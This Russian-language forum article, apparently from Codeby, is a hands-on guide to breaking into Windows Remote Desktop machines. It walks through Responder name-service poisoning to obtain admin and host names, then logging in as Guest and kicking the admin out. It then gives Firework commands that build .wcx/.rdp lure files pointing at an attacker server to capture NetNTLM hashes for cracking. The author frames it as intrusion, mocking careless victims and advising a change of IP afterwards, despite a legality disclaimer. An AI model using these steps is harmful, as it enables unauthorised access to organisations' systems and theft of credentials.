Добрый день , Друзья,Уважаемые Форумчане и те , кто следит за пульсом ИБ.
О чём мы будем с вами сегодня говорить : о банальной эксплуатации дедика и новом инструменте Firework. Этот инструмент нам помогает разнообразить атаки на удалённые рабочие столы Windows. У нас с вами был и так перерывчик , который разбавили моим нетрезвым присутствием и примитивным моим же творчеством. Пора и о серьёзных вещах поговорить.
Натолкнуло меня на написание этой статьи общение с девушкой-секретаршей из областной администрации моего города.
Опустим лирику и рассуждения о пустом смысле переписки с администрациями,если это конечно реально не целевая атака))
Речь шла об отправке письма ей на почту мной в виде файла pdf. Я ещё переспросил,не боятся ли они получать файлы в таком формате. На что , мне Чудо томным голоском промурчало,что они внимательно и в скоростном режиме загруженности читают все файлы.. Занавес короче , в общем , звонок-то был деловой конечно , но мысли меня посетили при этом нехорошие и холодок по спине пробежал. При этом вспомнились известные вредоносы pdf. Здешним жителям не надо объяснять ,чем это чревато и насколько бестолково при этом выглядит защита сервисов.
Т.е. , из письма сейчас какого-либо сервиса тяжело выцыганить IP-адрес жертвы ,что яндекс,что другие сервисы , об этом позаботились уже. Но ради чего? Если всё у нас так , да по-быстренькому ещё , открывают , читают.В общем , страх потеряли , если он вообще был).
Автор обзора и Администрация ресурса напоминают,что категорически запрещено использование рассматриваемых техник в незаконных целях. Вся информация предназначена исключительно для изучения проблем безопасности и ознакомления.
К делу. Все прекрасно знают,что организации наиболее подвержены атакам,связанным с RDP. Админы вынуждены регулярно подключаться к удалённым рабочим столам для урегулирования проблем и настроек. Неправильно сказал-компьютеры потенциальных жертв настроены так,что к ним возможно получить удалённый доступ. Вот это вот по-нашему уже.
Вот , простой пример сканирования Nmap (хозяйство всё моё и для примера):
Перед вами потенциальный дедик с открытым 3389 (Remote Desktop) и 139 портами. Зря ещё 4899-й не открыт (программа Remote Administrator). Мелочиться здесь не стоит и сразу вводим в дело программу responder , которая выступит отравителем LLMNR,NBT-NS и MDNS:
Запустил её ещё без мошеннического прокси-сервера WPAD (опции -W). Это мощный инструмент ,выступающий в качестве Mitm-атаки. В Kali-Linux он есть. Он поддерживает HTTP/SMB/MSSQL/FTP/LDAP аутентификацию с поддержкой NTLMv1 и NTLMv2 -хэшей. Я его применил немного иначе , как видите , для менее ранней машины Windows XP. Хотя он более эффективен для серверов и более поздних версий Windows. Но ,тем не менее , закрашен пользователь-админ и название станции-компа. Заодно видим , как Responder нам вытащил название AV , работающего на атакуемой стороне. Тут даже к гадалке не ходи , пускаем смело в ход простенькую программу управления удалёнными рабочими столами Windows-vinagre.
В Kali Linux она также присутствует , можете не качать.А если кому надо:
Код:
#apt-get install vinagreResponder нам пригнал название компа и суперпользователя. Более,для счастья не надо. Как это получилось? Ответ-Любая активность при работе Responder на нашей машине в нашу сторону со стороны атакуемой тачки. Это может быть открытие файла с реверсом , вредоноса. Это может быть ping со стороны админа атакованной жертвы , ответное сканирование.(С пренебрежением средств анонимности естественно). Так называемый приём "Вызывание огня на себя" , или "Огонь , иди со мной" как в сериале "Твин Пикс". Ну вот типичный случай перед вами пинга , в результате которого у нас админ и название рабочей станции в кармане. Тут можно атакующему временно слиться,затаиться,поменять IP и все прочие данные для анонимности. Дело сделано , админ повёлся на ловушку.
Далее,подключаемся,причём,заметьте,дело обстоит не просто. Я не стал вводить сразу админа,а попытался зайти Гостем в систему.
Ошибка админов в том,что включен пользователь Гость.А куда они денутся? Но и ещё разрешён политиками для управления удалёнными столами-это наигрубейшая оплошность , хотя немного спасёт ситуацию при таких атаках. Тут мы прописываем смело слово Гость вместо заштрихованного админского аккаунта.
На что мне система ,на самом деле ,выдала имя админа,название компа,сказала что админ вот под таким-то пользователем уже в системе. И предлагает мне его выпихнуть. Даю согласие-дурачье дело не хитрое.)) Если в системе админа нет,то получаем контроль без каких-либо толканий плечами. (К слову,с обратной стороны админов он-лайн,вас тоже могут бортануть и позаботиться о безопасности в оперативном режиме)
В итоге,пользуем дедик:
Теперь,что у нас делает Firework? Ну ,во-первых,давайте её установим всё же:
Код:
# git clone https://github.com/SpiderLabs/Firework.git
# cd Firework
# pip install -r requirements.txt , либо # pip2 requirements.txt- как пойдёт.
Прога работает вообще-то на python2.7 пока
# chmod +x firework.py
# python2 firework.py -h запускаем.Итак,Firework создан для взаимодействия с удалёнными рабочими столами и создания файлов для работы с ними же. И облегчающим процесс инициализации при атаке,не больше,ни меньше,Господа. Он также заточен под то,чтобы захватить хеши NetNTLM из атакуемой системы. Может добавить свой ярлык запуска файла RDP в меню "Пуск"-это конечно зашквар и открытое хулиганство.
Генерирует прога сразу же вот такие файлы,которые могут быть использованы в разных векторах атак.
Firework вам предлагает файл формата WCX , который при попадании на тестируемый компьютер и его вызова , предлагает сеанс удалённого доступа. Не дай всевышним силам , девочка-пипеточка , нажмёт нужные атакующему кнопки согласия (далее)-мгновенная гарантия сеанса доступа.
Что ещё здесь-это сам payload , который выглядит вот так:
Как вы можете видеть, файл просто содержит URL-адрес удалённого веб-сервера. Этот URL-адрес должен ссылаться на файл XML , содержащий информацию настройки приложений.
Если мы получаем хэш ,то можно попытаться взломать его с помощью Джона , или , возможно , мы можем изменить процесс для передачи хэша в приложение, к которому у нас есть доступ. Для более поздних версий Windows, таких как 10-ка.
Windows может загрузить наши файлы .rdp и .ico , сгенерированные Firework. Атакующему здесь необходимо располагать своим сервером , преимущественно RDP , откуда указывать свой url-адрес. Чтобы вам голову не морочить об этой технике атаки смотрим страницу
Ссылка скрыта от гостей
.Базовые команды Firework :
Код:
# python ./firework.py -c назв_компании -u https://example.org/ -a Firework -e .fwk -i ./firework.icoЕсли желаем запустить встроенный веб-сервер на альтернативном порту, используем флаг -l , как показано ниже:
Код:
# python ./firework.py -c назв_компании -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443Примечание: пароли, хранящиеся в файлах .rdp, могут игнорироваться в конфигурации по умолчанию.
Но попытка-не пытка , пробуем использовать при аутентификации сгенерированный ,так назывемый пароль 51:
Код:
# python ./firework.py -c назв_компании -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>
P.S В статье конечно много не сказано о реакции AV. Как всегда , халатность и спешка при обязанностях и заданном темпе "стабильности" (берите во внимание начало статьи) , помогает проведению аналогичному роду атак. На этом пока всё , рад был встрече.Спасибо,что с нами.Читайте Codeby. Благодарю за внимание и до новых встреч.
